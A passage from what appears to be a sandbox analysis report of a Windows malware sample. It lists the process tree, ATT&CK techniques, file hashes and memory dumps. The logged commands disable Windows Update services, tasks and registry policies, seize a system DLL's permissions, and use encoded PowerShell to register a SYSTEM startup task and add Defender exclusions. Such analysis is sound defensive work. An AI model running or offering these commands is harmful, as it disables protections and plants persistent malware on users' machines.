3⤵
PID:2420

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
3⤵
PID:2124

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
3⤵
PID:4976

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
3⤵
PID:4092

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
3⤵
PID:2432

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
3⤵
PID:3772

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
PID:1828

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:1548

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4160

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4484

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1948

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3668

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZAB4AHAAIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAcABvAHcAZQByAHMAaABlAGwAbAAnACAALQBBAHIAZwB1AG0AZQBuAHQAIAAnAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAIgBQAEEAQQBqAEEASABBAEEAWgBBAEIANgBBAEcATQBBAEkAdwBBACsAQQBDAEEAQQBVAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAMABBAFUAQQBCAHkAQQBHADgAQQBZAHcAQgBsAEEASABNAEEAYwB3AEEAZwBBAEMAMABBAFIAZwBCAHAAQQBHAHcAQQBaAFEAQgBRAEEARwBFAEEAZABBAEIAbwBBAEMAQQBBAEoAdwBCAEQAQQBEAG8AQQBYAEEAQgBRAEEASABJAEEAYgB3AEIAbgBBAEgASQBBAFkAUQBCAHQAQQBDAEEAQQBSAGcAQgBwAEEARwB3AEEAWgBRAEIAegBBAEYAdwBBAE4AQQBBAHkAQQBEAE0AQQBOAFEAQQAxAEEARABNAEEATQBnAEEAMgBBAEQARQBBAEwAUQBCAE8AQQBEAFUAQQBNAGcAQQAxAEEARABRAEEATQBnAEEAdABBAEQAVQBBAE4AZwBCAEcAQQBFAGMAQQBVAHcAQgBJAEEARgB3AEEAWgB3AEIAegBBAEcAUQBBAE4AUQBBADAAQQBEAE0AQQBNAGcAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAHQAQQBGAFkAQQBaAFEAQgB5AEEARwBJAEEASQBBAEIAUwBBAEgAVQBBAGIAZwBCAEIAQQBIAE0AQQBJAEEAQQA4AEEAQwBNAEEAYQBRAEIAMQBBAEgAawBBAFoAZwBBAGoAQQBEADQAQQAiACcAKQAgADwAIwBqAHUAdQBlACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAeQBtACMAPgAgAC0AUwBlAHQAdABpAG4AZwBzACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAaQBzAGEAbABsAG8AdwBIAGEAcgBkAFQAZQByAG0AaQBuAGEAdABlACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAbwBuAHQAUwB0AG8AcABPAG4ASQBkAGwAZQBFAG4AZAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AVABpAG0AZQBMAGkAbQBpAHQAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBEAGEAeQBzACAAMQAwADAAMAApACkAIAA8ACMAegB4AHoAeAAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcAZwBzAGQANQA0ADMAMgAnACAALQBVAHMAZQByACAAJwBTAHkAcwB0AGUAbQAnACAALQBSAHUAbgBMAGUAdgBlAGwAIAAnAEgAaQBnAGgAZQBzAHQAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGUAaQAjAD4AOwAgAEMAbwBwAHkALQBJAHQAZQBtACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGMANwBhAGQAOABhAGYAZgA0AGIAOQBiAGMAYQBhAGYAOAAzADYAMgBiAGMANAA2AGQAYgBiADMAMwA1AGIAZAAuAGUAeABlACcAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcADQAMgAzADUANQAzADIANgAxAC0ATgA1ADIANQA0ADIALQA1ADYARgBHAFMASABcAGcAcwBkADUANAAzADIALgBlAHgAZQAnACAALQBGAG8AcgBjAGUAIAA8ACMAbABpAHEAIwA+ADsAIABTAHQAYQByAHQALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAAPAAjAGoAawBtACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBnAHMAZAA1ADQAMwAyACcAOwA="
2⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2200

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\c7ad8aff4b9bcaaf8362bc46dbb335bd.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:4956

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
3⤵
PID:4752

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHAAZAB6AGMAIwA+ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwANAAyADMANQA1ADMAMgA2ADEALQBOADUAMgA1ADQAMgAtADUANgBGAEcAUwBIAFwAZwBzAGQANQA0ADMAMgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAaQB1AHkAZgAjAD4A"
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1296

C:\Program Files\423553261-N52542-56FGSH\gsd5432.exe
"C:\Program Files\423553261-N52542-56FGSH\gsd5432.exe"
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1284

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBiAGEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgBoAGoAbwAjAD4A"
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4252

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
PID:4248

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:1540

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:1824

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:3420

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:2488

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:4736

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:3472

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:4980

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies registry key
PID:3412

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:3356

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:4268

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:616

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:624

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1972

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:2360

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:2140

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:2908

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:520

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:2624

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:396

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:4876

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:4620

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:3580

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:2272

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
PID:4500

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
PID:8

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
PID:4680

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
PID:2040

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
PID:2024

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe "afakligmufddfq"
3⤵
PID:3060

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe yyyqnbmbehbu1 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
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:444

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\423553261-N52542-56FGSH\gsd5432.exe

Filesize
5.0MB

MD5
c7ad8aff4b9bcaaf8362bc46dbb335bd

SHA1
6da9bd46beba784cde7bce3d73963567c9efb9b0

SHA256
1c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84

SHA512
e6d3f7e3e73f8445c8233202b143d5a932c7b6d0ee53c77de857a825db416bc0c73d32eaea6b7720af3ee582089dbe9071426dcbf2c02bd96e2db9ac379b0aa3

Download Submit
C:\Program Files\423553261-N52542-56FGSH\gsd5432.exe

Filesize
5.0MB

MD5
c7ad8aff4b9bcaaf8362bc46dbb335bd

SHA1
6da9bd46beba784cde7bce3d73963567c9efb9b0

SHA256
1c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84

SHA512
e6d3f7e3e73f8445c8233202b143d5a932c7b6d0ee53c77de857a825db416bc0c73d32eaea6b7720af3ee582089dbe9071426dcbf2c02bd96e2db9ac379b0aa3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e907f77659a6601fcc408274894da2e

SHA1
9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

SHA256
385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

SHA512
34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2238871af228384f4b8cdc65117ba9f1

SHA1
2a200725f1f32e5a12546aa7fd7a8c5906757bd1

SHA256
daa246f73567ad176e744abdb82d991dd8cffe0e2d847d2feefeb84f7fa5f882

SHA512
1833d508fdbe2b8722b787bfc0c1848a5bcdeb7ec01e94158d78e9e6ceb397a2515d88bb8ca4ec1a810263fc900b5b1ea1d788aa103967ed61436e617fab47bf

Download Submit
memory/8-195-0x0000000000000000-mapping.dmp

Download
memory/392-165-0x0000000000000000-mapping.dmp

Download
memory/396-228-0x0000000000000000-mapping.dmp

Download
memory/444-219-0x00000210A5C60000-0x00000210A5C80000-memory.dmp

Filesize
128KB

Download
memory/444-232-0x00000210A5CA0000-0x00000210A5CC0000-memory.dmp

Filesize
128KB

Download
memory/444-236-0x00000210A5D00000-0x00000210A5D20000-memory.dmp

Filesize
128KB

Download
memory/444-235-0x00000210A5D00000-0x00000210A5D20000-memory.dmp

Filesize
128KB

Download
memory/444-234-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/444-231-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/444-218-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/444-217-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/444-215-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/444-216-0x000000014036EAC4-mapping.dmp

Download
memory/616-210-0x0000000000000000-mapping.dmp

Download
memory/624-211-0x0000000000000000-mapping.dmp

Download
memory/784-146-0x0000000000000000-mapping.dmp

Download
memory/908-164-0x0000000000000000-mapping.dmp

Download
memory/1284-176-0x0000000000000000-mapping.dmp

Download
memory/1284-212-0x00007FFFB27A0000-0x00007FFFB3261000-memory.dmp

Filesize
10.8MB

Download
memory/1284-183-0x00007FFFB27A0000-0x00007FFFB3261000-memory.dmp

Filesize
10.8MB

Download
memory/1284-203-0x000000001B1F0000-0x000000001B202000-memory.dmp

Filesize
72KB

Download
memory/1284-220-0x00007FFFB27A0000-0x00007FFFB3261000-memory.dmp

Filesize
10.8MB

Download
memory/1296-163-0x00007FFFB27A0000-0x00007FFFB3261000-memory.dmp

Filesize
10.8MB

Download
memory/1296-178-0x00007FFFB27A0000-0x00007FFFB3261000-memory.dmp

Filesize
10.8MB

Download
memory/1540-196-0x0000000000000000-mapping.dmp

Download
memory/1548-138-0x0000000000000000-mapping.dmp

Download
memory/1824-198-0x0000000000000000-mapping.dmp

Download
memory/1828-174-0x0000000000000000-mapping.dmp

Download
memory/1852-144-0x0000000000000000-mapping.dmp

Download
memory/1948-145-0x0000000000000000-mapping.dmp

Download
memory/1972-151-0x0000000000000000-mapping.dmp

Download
memory/1972-224-0x0000000000000000-mapping.dmp

Download
memory/2024-201-0x0000000000000000-mapping.dmp

Download
memory/2036-167-0x0000000000000000-mapping.dmp

Download
memory/2040-199-0x0000000000000000-mapping.dmp

Download
memory/2056-149-0x0000000000000000-mapping.dmp

Download
memory/2124-169-0x0000000000000000-mapping.dmp

Download
memory/2140-227-0x0000000000000000-mapping.dmp

Download
memory/2200-158-0x00007FFFB2580000-0x00007FFFB3041000-memory.dmp

Filesize
10.8MB

Download
memory/2200-159-0x00007FFFB2580000-0x00007FFFB3041000-memory.dmp

Filesize
10.8MB

Download
memory/2200-153-0x0000000000000000-mapping.dmp

Download
memory/2236-133-0x0000000000000000-mapping.dmp

Download
memory/2236-134-0x00000170D20A0000-0x00000170D20C2000-memory.dmp

Filesize
136KB

Download
memory/2236-136-0x00007FFFB2580000-0x00007FFFB3041000-memory.dmp

Filesize
10.8MB

Download
memory/2272-221-0x0000000000000000-mapping.dmp

Download
memory/2308-150-0x0000000000000000-mapping.dmp

Download
memory/2360-226-0x0000000000000000-mapping.dmp

Download
memory/2396-152-0x0000000000000000-mapping.dmp

Download
memory/2420-168-0x0000000000000000-mapping.dmp

Download
memory/2432-172-0x0000000000000000-mapping.dmp

Download
memory/2488-202-0x0000000000000000-mapping.dmp

Download
memory/2624-230-0x0000000000000000-mapping.dmp

Download
memory/2908-229-0x0000000000000000-mapping.dmp

Download
memory/3060-214-0x00007FFFB27A0000-0x00007FFFB3261000-memory.dmp

Filesize
10.8MB

Download
memory/3060-213-0x00000275E90A0000-0x00000275E9197000-memory.dmp

Filesize
988KB

Download
memory/3060-233-0x00007FFFB27A0000-0x00007FFFB3261000-memory.dmp

Filesize
10.8MB

Download
memory/3116-154-0x0000000000000000-mapping.dmp

Download
memory/3356-143-0x0000000000000000-mapping.dmp

Download
memory/3356-208-0x0000000000000000-mapping.dmp

Download
memory/3412-207-0x0000000000000000-mapping.dmp

Download
memory/3420-200-0x0000000000000000-mapping.dmp

Download
memory/3472-205-0x0000000000000000-mapping.dmp

Download
memory/3580-222-0x0000000000000000-mapping.dmp

Download
memory/3668-147-0x0000000000000000-mapping.dmp

Download
memory/3692-139-0x0000000000000000-mapping.dmp

Download
memory/3772-173-0x0000000000000000-mapping.dmp

Download
memory/3832-166-0x0000000000000000-mapping.dmp

Download
memory/4092-171-0x0000000000000000-mapping.dmp

Download
memory/4112-137-0x0000000000000000-mapping.dmp

Download
memory/4160-141-0x0000000000000000-mapping.dmp

Download
memory/4248-193-0x0000000000000000-mapping.dmp

Download
memory/4252-190-0x000002B21D030000-0x000002B21D036000-memory.dmp

Filesize
24KB

Download
memory/4252-185-0x000002B21CEA0000-0x000002B21CEAA000-memory.dmp

Filesize
40KB

Download
memory/4252-182-0x00007FFFB27A0000-0x00007FFFB3261000-memory.dmp

Filesize
10.8MB

Download
memory/4252-186-0x000002B21D010000-0x000002B21D02C000-memory.dmp

Filesize
112KB

Download
memory/4252-192-0x00007FFFB27A0000-0x00007FFFB3261000-memory.dmp

Filesize
10.8MB

Download
memory/4252-191-0x000002B21D040000-0x000002B21D04A000-memory.dmp

Filesize
40KB

Download
memory/4252-187-0x000002B21CFF0000-0x000002B21CFFA000-memory.dmp

Filesize
40KB

Download
memory/4252-189-0x000002B21D000000-0x000002B21D008000-memory.dmp

Filesize
32KB

Download
memory/4252-188-0x000002B21D050000-0x000002B21D06A000-memory.dmp

Filesize
104KB

Download
